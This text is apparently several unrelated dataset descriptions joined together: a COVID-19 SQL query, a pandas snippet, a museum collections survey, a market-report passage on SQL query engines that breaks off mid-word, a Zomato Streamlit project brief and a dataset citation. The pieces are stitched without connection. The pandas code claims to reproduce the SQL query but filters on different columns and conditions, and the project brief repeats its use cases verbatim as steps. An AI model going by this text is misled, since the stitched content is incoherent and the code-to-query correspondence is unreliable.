SELECT country, sum(suspected) as "Coronavirus uncontrolled spread count and human life loss", 100*sum(suspected)/(SELECT sum((suspected)) FROM "public"."coronavirus_updated") as "Global suspected Exposure of Coronavirus in percentage" FROM "public"."coronavirus_updated" WHERE suspected>0 AND deaths=0 GROUP BY country ORDER BY sum(suspected) DESC
Description: Coronavirus is getting stronger in particular countries, but how will we measure that? We can measure it by knowing the percentage of suspected patients amongst countries which still don't have any Coronavirus-related deaths. The following is a list.
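For readers working outside the Panoply warehouse, a rough pandas equivalent of Query 1 (assuming the attached CSV keeps the same column names as the warehouse table, and a hypothetical file name) is:

```python
import pandas as pd

# Assumes the attached CSV keeps the same column names as the warehouse table.
df = pd.read_csv("coronavirus_updated.csv")

# Rough equivalent of Query 1: regions with deaths where recoveries exceed half the deaths.
recovering = df[(df["Recovered"] > df["Deaths"] / 2) & (df["Deaths"] > 0)]
print(recovering[["Province/State", "Deaths", "Recovered", "Confirmed"]]
      .rename(columns={"Province/State": "Region"}))
```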
Data Provided by: SRK, Data Scientist at H2O.ai, Chennai, India
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
From 2016 to 2018, we surveyed the world's largest natural history museum collections to begin mapping this globally distributed scientific infrastructure. The resulting dataset includes 73 institutions across the globe. It has:
Basic institution data for the 73 contributing institutions, including estimated total collection sizes, geographic locations (to the city) and latitude/longitude, and Research Organization Registry (ROR) identifiers where available.
Resourcing information, covering the numbers of research, collections and volunteer staff in each institution.
Indicators of the presence and size of collections within each institution broken down into a grid of 19 collection disciplines and 16 geographic regions.
Measures of the depth and breadth of individual researcher experience across the same disciplines and geographic regions.
This dataset contains the data (raw and processed) collected for the survey, and specifications for the schema used to store the data. It includes:
A diagram of the MySQL database schema.
A SQL dump of the MySQL database schema, excluding the data.
A SQL dump of the MySQL database schema with all data. This may be imported into an instance of MySQL Server to create a complete reconstruction of the database.
Raw data from each database table in CSV format.
A set of more human-readable views of the data in CSV format. These correspond to the database tables, but foreign keys are substituted for values from the linked tables to make the data easier to read and analyse.
A text file containing the definitions of the size categories used in the collection_unit table.
The global collections data may also be accessed at https://rebrand.ly/global-collections. This is a preliminary dashboard, constructed and published using Microsoft Power BI, that enables the exploration of the data through a set of visualisations and filters. The dashboard consists of three pages:
Institutional profile: Enables the selection of a specific institution and provides summary information on the institution and its location, staffing, total collection size, collection breakdown and researcher expertise.
Overall heatmap: Supports an interactive exploration of the global picture, including a heatmap of collection distribution across the discipline and geographic categories, and visualisations that demonstrate the relative breadth of collections across institutions and correlations between collection size and breadth. Various filters allow the focus to be refined to specific regions and collection sizes.
Browse: Provides some alternative methods of filtering and visualising the global dataset to look at patterns in the distribution and size of different types of collections across the global view.
According to our latest research, the global SQL Query Engine market size in 2024 stands at USD 3.84 billion, reflecting robust growth driven by the increasing demand for efficient data management and analytics solutions across industries. The market is projected to expand at a CAGR of 12.1% from 2025 to 2033, reaching an estimated value of USD 10.77 billion by the end of the forecast period. This remarkable growth is underpinned by the escalating volume of structured and unstructured data, the proliferation of cloud-based applications, and the widespread adoption of advanced analytics and business intelligence tools.
One of the primary growth factors driving the SQL Query Engine market is the exponential increase in data generation from digital transformation initiatives, IoT devices, and enterprise applications. Organizations are increasingly relying on SQL query engines to extract actionable insights from vast datasets, enabling informed decision-making and operational efficiency. The integration of SQL engines with big data platforms and cloud environments further amplifies their utility, as businesses seek scalable and high-performance solutions that can seamlessly handle complex queries across distributed data sources. This trend is particularly pronounced in industries such as BFSI, healthcare, and retail, where real-time data analysis is critical for competitive advantage and regulatory compliance.
Another significant driver is the rapid evolution of cloud computing and the migration of enterprise workloads to cloud platforms. Cloud-based SQL query engines offer flexibility, scalability, and cost-effectiveness, making them highly attractive to organizations looking to modernize their IT infrastructure. The ability to run SQL queries on cloud-native data warehouses and integrate with various analytics tools has democratized access to advanced data capabilities, even for small and medium enterprises. Furthermore, innovations in query optimization, parallel processing, and support for hybrid and multi-cloud deployments are fostering greater adoption of SQL query engines across diverse business environments.
The market is also benefiting from the growing emphasis on business intelligence and data-driven decision-making. Enterprises are leveraging SQL query engines to power dashboards, generate real-time reports, and facilitate self-service analytics for non-technical users. Enhanced support for structured query language, improved user interfaces, and integration with visualization tools are making it easier for business users to interact with data, driving broader usage across organizations. Additionally, the rise of data integration and analytics as core business functions is pushing vendors to continuously innovate, offering advanced features such as in-memory processing, machine learning integration, and support for semi-structured data formats.
Regionally, North America continues to dominate the SQL Query Engine market, accounting for the largest revenue share in 2024. This is attributed to the strong presence of technology giants, early adoption of cloud technologies, and a thriving ecosystem of data-driven enterprises. However, Asia Pacific is expected to exhibit the fastest growth during the forecast period, fueled by rapid digitalization, increasing investments in cloud infrastructure, and the emergence of new business models in countries such as China, India, and Japan. Europe, Latin America, and the Middle East & Africa are also witnessing steady growth, supported by regulatory mandates for data governance and the rising importance of analytics in public and private sectors.
The SQL Query Engine market is segmented by component into Software and Services. The software segment commands a substantial share of the market, as enterprises increasingly invest in advanced query engines to enhance their data processing and analytics capabilities. Modern SQL query engine software offers robust features such as distributed query pro
License: CDLA Sharing 1.0, https://cdla.io/sharing-1-0/
Imagine you are working as a data scientist at Zomato. Your goal is to enhance operational efficiency and improve customer satisfaction by analyzing food delivery data. You need to build an interactive Streamlit tool that enables seamless data entry for managing orders, customers, restaurants, and deliveries. The tool should support robust database operations like adding columns or creating new tables dynamically while maintaining compatibility with existing code.

## Business Use Cases
- Order Management: Identifying peak ordering times and locations. Tracking delayed and canceled deliveries.
- Customer Analytics: Analyzing customer preferences and order patterns. Identifying top customers based on order frequency and value.
- Delivery Optimization: Analyzing delivery times and delays to improve logistics. Tracking delivery personnel performance.
- Restaurant Insights: Evaluating the most popular restaurants and cuisines. Monitoring order values and frequency by restaurant.
## Approach
1) Dataset Creation: Use Python (Faker) to generate synthetic datasets for customers, orders, restaurants, and deliveries. Populate the SQL database with these datasets.
2) Database Design: Create normalized SQL tables for Customers, Orders, Restaurants, and Deliveries. Ensure compatibility for dynamic schema changes (e.g., adding columns, creating new tables).
3) Data Entry Tool: Develop a Streamlit app for adding, updating, and deleting records in the SQL database, and for dynamically creating new tables or modifying existing ones (see the sketch after this list).
4) Data Insights: Use SQL queries and Python to extract insights like peak times, delayed deliveries, and customer trends. Visualize the insights in the Streamlit app (add-on).
5) OOP Implementation: Encapsulate database operations in Python classes. Implement robust and reusable methods for CRUD (Create, Read, Update, Delete) operations.
6) Order Management: Identifying peak ordering times and locations. Tracking delayed and canceled deliveries.
7) Customer Analytics: Analyzing customer preferences and order patterns. Identifying top customers based on order frequency and value.
8) Delivery Optimization: Analyzing delivery times and delays to improve logistics. Tracking delivery personnel performance.
9) Restaurant Insights: Evaluating the most popular restaurants and cuisines. Monitoring order values and frequency by restaurant.
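A minimal sketch of step 3 above, combining Streamlit, SQLite and Faker. The schema is deliberately simplified and is an assumption, not the project's full normalized Customers/Orders/Restaurants/Deliveries design:

```python
import sqlite3

import streamlit as st
from faker import Faker

# Simplified, assumed schema: the real project uses several normalized tables.
con = sqlite3.connect("zomato.db", check_same_thread=False)
con.execute("""CREATE TABLE IF NOT EXISTS orders (
    order_id INTEGER PRIMARY KEY AUTOINCREMENT,
    customer_name TEXT, restaurant TEXT, amount REAL, status TEXT)""")

st.title("Zomato order entry")
name = st.text_input("Customer name", Faker().name())  # Faker pre-fills synthetic data
restaurant = st.text_input("Restaurant")
amount = st.number_input("Order value", min_value=0.0)
status = st.selectbox("Status", ["delivered", "delayed", "cancelled"])

if st.button("Add order"):
    con.execute(
        "INSERT INTO orders (customer_name, restaurant, amount, status) VALUES (?, ?, ?, ?)",
        (name, restaurant, amount, status),
    )
    con.commit()
    st.success("Order saved")

# Show the most recent entries so the data-entry loop is visible in the app.
st.dataframe(con.execute(
    "SELECT * FROM orders ORDER BY order_id DESC LIMIT 20").fetchall())
```

Run it with `streamlit run app.py`; the full project would extend this with update/delete operations, dynamic schema changes, and the 20 analysis queries.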
## Results
By the end of this project, learners will achieve: a fully functional SQL database for managing food delivery data; an interactive Streamlit app for data entry and analysis; 20 SQL queries written for the analysis; dynamic compatibility with database schema changes; and comprehensive insights into order trends, delivery performance, and customer behavior.
## Project Evaluation Metrics
- Database Design: Proper normalization of tables and relationships between them.
- Code Quality: Use of OOP principles to ensure modularity and scalability; robust error handling for database operations.
- Streamlit App Functionality: Usability of the interface for data entry and insights; compatibility with schema changes.
- Data Insights: Use 20 SQL queries for data analysis.
- Documentation: Clear and comprehensive explanation of the code and approach.
License: Attribution 4.0 (CC BY 4.0), https://creativecommons.org/licenses/by/4.0/
Overview
This dataset builds from sql-create-context.

@misc{b-mc2_2023_sql-create-context,
  title  = {sql-create-context Dataset},
  author = {b-mc2},
  year   = {2023},
  url    = {https://huggingface.co/datasets/b-mc2/sql-create-context},
  note   = {This dataset was created by modifying data from the following sources: \cite{zhongSeq2SQL2017, yu2018spider}.},
}